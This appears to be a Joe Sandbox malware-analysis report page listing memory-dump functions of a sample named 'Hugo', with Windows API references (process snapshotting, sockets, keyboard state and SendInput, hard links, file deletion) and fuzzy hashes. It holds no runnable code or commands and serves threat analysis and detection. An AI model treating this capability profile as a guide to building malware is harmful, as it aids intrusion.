Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ca0208092c906023c58685a9eb87fca37012efac3cfc0d63e5fb639efcf31cb
Instruction ID: 7afc9496bd8c6391dfa0b676062e53f39515fd1bb2f1201b3deb28343ec56eb3
Opcode Fuzzy Hash: 4ca0208092c906023c58685a9eb87fca37012efac3cfc0d63e5fb639efcf31cb
Instruction Fuzzy Hash: 65C17D75A0021AEFDB05CF98C884EAEB7B5FF88714F108199E409DB251DB30EE41EB91

Function 00F441F3 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00F4427E
__alldvrm.LIBCMT ref: 00F4447F
__alldvrm.LIBCMT ref: 00F444A1

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
Instruction ID: 190fa0af24f39236e100d31bb24542e5541f7cc6c563263033226bd38b507acc
Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
Instruction Fuzzy Hash: C5A14772D007869FEB11CF28C8917BEBFE4EF11320F2441A9ED95AB291D278A941E750

Function 00F70D26 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00FB0BD4,?), ref: 00F70EE0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00FB0BD4,?), ref: 00F70EF8
CLSIDFromProgID.OLE32(?,?,00000000,00FADCE0,000000FF,?,00000000,00000800,00000000,?,00FB0BD4,?), ref: 00F70F1D
_memcmp.LIBVCRUNTIME ref: 00F70F3E

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 078467d340538240a0ed1945270e1f87531296227ab2b06c75f88f88a3708299
Instruction ID: 901ed09e3826dda5ebad2131649c0b60541be9c323b62bbd1f95c33d4429b854
Opcode Fuzzy Hash: 078467d340538240a0ed1945270e1f87531296227ab2b06c75f88f88a3708299
Instruction Fuzzy Hash: 3A813A71A00109EFCB14DF94C884EEEB7B9FF89315F208559F506AB250DB71AE06DB61

Function 00F9B0DC Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00F9B10C
Process32FirstW.KERNEL32(00000000,?), ref: 00F9B11A

Part of subcall function 00F1B329: _wcslen.LIBCMT ref: 00F1B333

Process32NextW.KERNEL32(00000000,?), ref: 00F9B1FC
CloseHandle.KERNEL32(00000000), ref: 00F9B20B

Part of subcall function 00F2E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00F54D73,?), ref: 00F2E395

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 70ef6fc7b6390500aa0b05bf026437f8c0e0fb9be82dd475095a30d4d14461b5
Instruction ID: 5ac87248d0cc9a098c10d4ff1e3415f4e789d1862a6ef7a8629c6b1a1ebb31cb
Opcode Fuzzy Hash: 70ef6fc7b6390500aa0b05bf026437f8c0e0fb9be82dd475095a30d4d14461b5
Instruction Fuzzy Hash: B1518BB1908301AFD710EF24DC86A9BBBE8FF88754F40491DF88997251EB34D944DB92

Function 00F51711 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00F51840

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 3f697234787d16f267f842d9fab062193d949ced96fc1dbaab3e769b1191a757
Instruction ID: 22837c77b11057968e80ad9236ba00b3913f0a01cb9fb32777eabc1627e32e0d
Opcode Fuzzy Hash: 3f697234787d16f267f842d9fab062193d949ced96fc1dbaab3e769b1191a757
Instruction Fuzzy Hash: 97413932E00100ABDB307BBD9C82B7E3AA4FF46733F140625FE18D6191DA796809B361

Function 00F92533 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00F9255A
WSAGetLastError.WSOCK32 ref: 00F92568
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00F925E7
WSAGetLastError.WSOCK32 ref: 00F925F1

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 9e535154d6deb43a40a46984d06b950f3ba496fb00d0778de3779f9ed41a9191
Instruction ID: 3defd8095f3315208746888ebe349ec6116b9e7f4d1b7f773659f4e1257d3b6c
Opcode Fuzzy Hash: 9e535154d6deb43a40a46984d06b950f3ba496fb00d0778de3779f9ed41a9191
Instruction Fuzzy Hash: DF41F474A40200AFE720AF24DC86F6A37E4AB44768F54C44CF91A8F6D2C775ED42DB90

Function 00FA6CB0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00FA6D1A
ScreenToClient.USER32(?,?), ref: 00FA6D4D
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00FA6DBA

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 6c9ce3e0d8eec15dd66b8eb5d222037366569b61a6877ce8a7ea5719f2cf277c
Instruction ID: 61795fb59a540a9dba37ff038f9c8f36d74b95bdd342989d556d77d12c0a3dab
Opcode Fuzzy Hash: 6c9ce3e0d8eec15dd66b8eb5d222037366569b61a6877ce8a7ea5719f2cf277c
Instruction Fuzzy Hash: DD512DB4A00209EFCF24DF64D8809AE7BB6FF56364F148559F915DB290DB30AD81EB50

Function 00F4B79F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc0793235f6d2c681194bf534a6a1ae85241eda89ad55189480bdf079a66865e
Instruction ID: bc037c3ca766ec3c097e6487f17b113f06ece6cb81835a404cd8533fb9436f44
Opcode Fuzzy Hash: bc0793235f6d2c681194bf534a6a1ae85241eda89ad55189480bdf079a66865e
Instruction Fuzzy Hash: 5D410A71A00704AFE725AF78CC41B6A7FEDEF84720F10852AF911DB292D775D9159780

Function 00F8611E Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00F861C8
GetLastError.KERNEL32(?,00000000), ref: 00F861EE
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00F86213
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00F8623F

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 76b0f90b534822132e061994f0d974143bd1d82667f27e5a869f792c48d7ae10
Instruction ID: 59a8db52e9a70440c7dd291f710a004ac7d58c2ed1ccda34fc6ecb5fb2875a2c
Opcode Fuzzy Hash: 76b0f90b534822132e061994f0d974143bd1d82667f27e5a869f792c48d7ae10
Instruction Fuzzy Hash: B4414135600610DFCF11EF55C945A9DBBE2EF89720B188488E84A9B362CB34FD41EB91

Function 00F7B41E Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00F7B473
SetKeyboardState.USER32(00000080), ref: 00F7B48F
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00F7B4FD
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00F7B54F

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 43f2ff37492f41cefd4b786e718030800cf1746a67e09a53414265d213535be5
Instruction ID: 9cd69d573f7a216840f0b07d8d9f2941925c1b7c935058c37f5bb038fed08aa3
Opcode Fuzzy Hash: 43f2ff37492f41cefd4b786e718030800cf1746a67e09a53414265d213535be5
Instruction Fuzzy Hash: 5B310871E402086EFF31CF259C05BFA7BB5AB4A320F08C21BF49A961D6C7748945A763

Function 00F7B563 Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00F7B5B8
SetKeyboardState.USER32(00000080,?,00008000), ref: 00F7B5D4
PostMessageW.USER32(00000000,00000101,00000000), ref: 00F7B63B
SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00F7B68D

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 95e6a1317e9029cf21183b365135e578d6d326f88897bebd137cebf3671d036f
Instruction ID: e7bf49d47446446d977c52d5da22b6c5b7a020adb39a5bfd586fca90fff3d89c
Opcode Fuzzy Hash: 95e6a1317e9029cf21183b365135e578d6d326f88897bebd137cebf3671d036f
Instruction Fuzzy Hash: 6C31E970D4060C6EFF208B658C057FE7BA6AF86320F08C26BE589561D1C7748A55ABA3

Function 00FA80AE Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00FA80D4
GetWindowRect.USER32(?,?), ref: 00FA814A
PtInRect.USER32(?,?,?), ref: 00FA815A
MessageBeep.USER32(00000000), ref: 00FA81C6

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: b67a4451ebc3205418501d32041314d4c6159b7c106f07c8a83806f4b6af640c
Instruction ID: e19a895bc8e5411b99aa193568ff7292c9369959226802569f3daf766d3a301c
Opcode Fuzzy Hash: b67a4451ebc3205418501d32041314d4c6159b7c106f07c8a83806f4b6af640c
Instruction Fuzzy Hash: 9F419EB4A00259DFCB11CF58C884AA9BBF5FF46364F1440A8E9559B261DBB0E843EB90

Function 00FA2176 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00FA2187

Part of subcall function 00F74393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F743AD
Part of subcall function 00F74393: GetCurrentThreadId.KERNEL32 ref: 00F743B4
Part of subcall function 00F74393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00F72F00), ref: 00F743BB

GetCaretPos.USER32(?), ref: 00FA219B
ClientToScreen.USER32(00000000,?), ref: 00FA21E8
GetForegroundWindow.USER32 ref: 00FA21EE

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 42391c1fcfa107d0a582db3e570178931908874cc1618db83aa9a2f8555bcdf5
Instruction ID: cbfbe171d16abe141294e7ac825b078deff114fd01c9f92a8ac96a39d7710ed0
Opcode Fuzzy Hash: 42391c1fcfa107d0a582db3e570178931908874cc1618db83aa9a2f8555bcdf5
Instruction Fuzzy Hash: 133141B1E00209AFD704EFA9CC81CEEB7F8EF49304B54846AE415E7211DB759E45DBA0

Function 00F7E8AC Relevance: 6.1, APIs: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 00F141EA: _wcslen.LIBCMT ref: 00F141EF

_wcslen.LIBCMT ref: 00F7E8E2
_wcslen.LIBCMT ref: 00F7E8F9
_wcslen.LIBCMT ref: 00F7E924
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00F7E92F

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: _wcslen$ExtentPoint32Text
String ID:
API String ID: 3763101759-0
Opcode ID: 03c7725995f1d49f9beb265b75c60058be4d3affb913f22128e66f8ddccc9c8a
Instruction ID: 4351eea432ef7de8f83d8f8c6f56309d5fba26c1427b96386bd3b1d19fde8f50
Opcode Fuzzy Hash: 03c7725995f1d49f9beb265b75c60058be4d3affb913f22128e66f8ddccc9c8a
Instruction Fuzzy Hash: AB21FE72D00214EFCB10AF64DD81BAEB7F4EF45360F104096F908BB241D674AD41D7A2

Function 00FA9A25 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F124B0

GetCursorPos.USER32(?), ref: 00FA9A5D
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00FA9A72
GetCursorPos.USER32(?), ref: 00FA9ABA
DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00FA9AF0

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 8295acdf2dfd3cb639aae72ef527f78d1bec83b5b61beab365edff4746f8fc2e
Instruction ID: 369041fb65d9e79243b38f38a33519d569868c442c79266ef411187a616b4839
Opcode Fuzzy Hash: 8295acdf2dfd3cb639aae72ef527f78d1bec83b5b61beab365edff4746f8fc2e
Instruction Fuzzy Hash: 39219F75A00018AFCF258F94CC98EEE7BB9EB4A360F444166F9068B161D7B99950FB60

Function 00F7DB6C Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00FADC30), ref: 00F7DBA6
GetLastError.KERNEL32 ref: 00F7DBB5
CreateDirectoryW.KERNEL32(?,00000000), ref: 00F7DBC4
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00FADC30), ref: 00F7DC21

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 056533de76392e9bc5dba534b1d6b08e99f4dd29c1d8d8265c5dfad6e528f717
Instruction ID: a7a4e6f0233944ac95df9d7b0e8f27b2aea09c2d747de4e62eef99dc4a5f9e46
Opcode Fuzzy Hash: 056533de76392e9bc5dba534b1d6b08e99f4dd29c1d8d8265c5dfad6e528f717
Instruction Fuzzy Hash: 3621A3715043059F8704DF28C88199BBBF8EE96764F508A1EF49DC32A1D730D946EB53

Function 00FA321E Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00FA32A6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00FA32C0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00FA32CE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00FA32DC

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 8b7b14ed158695e53d5b8e681aa62d0dfd117ae1a39be8f9cfdea604c058113d
Instruction ID: 396dada709e06efe37d4d19d1aef24beba2802943bd36b19a4510509babb4488
Opcode Fuzzy Hash: 8b7b14ed158695e53d5b8e681aa62d0dfd117ae1a39be8f9cfdea604c058113d
Instruction Fuzzy Hash: 2A2103B1604115AFD7049F24CC45FAABB95EF82324F24825CF8268B6D2C775ED81D7D0

Function 00F7825C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00F796E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00F78271,?,000000FF,?,00F790BB,00000000,?,0000001C,?,?), ref: 00F796F3
Part of subcall function 00F796E4: lstrcpyW.KERNEL32(00000000,?,?,00F78271,?,000000FF,?,00F790BB,00000000,?,0000001C,?,?,00000000), ref: 00F79719
Part of subcall function 00F796E4: lstrcmpiW.KERNEL32(00000000,?,00F78271,?,000000FF,?,00F790BB,00000000,?,0000001C,?,?), ref: 00F7974A

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00F790BB,00000000,?,0000001C,?,?,00000000), ref: 00F7828A
lstrcpyW.KERNEL32(00000000,?,?,00F790BB,00000000,?,0000001C,?,?,00000000), ref: 00F782B0
lstrcmpiW.KERNEL32(00000002,cdecl,?,00F790BB,00000000,?,0000001C,?,?,00000000), ref: 00F782EB

Strings

cdecl, xrefs: 00F782E2

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
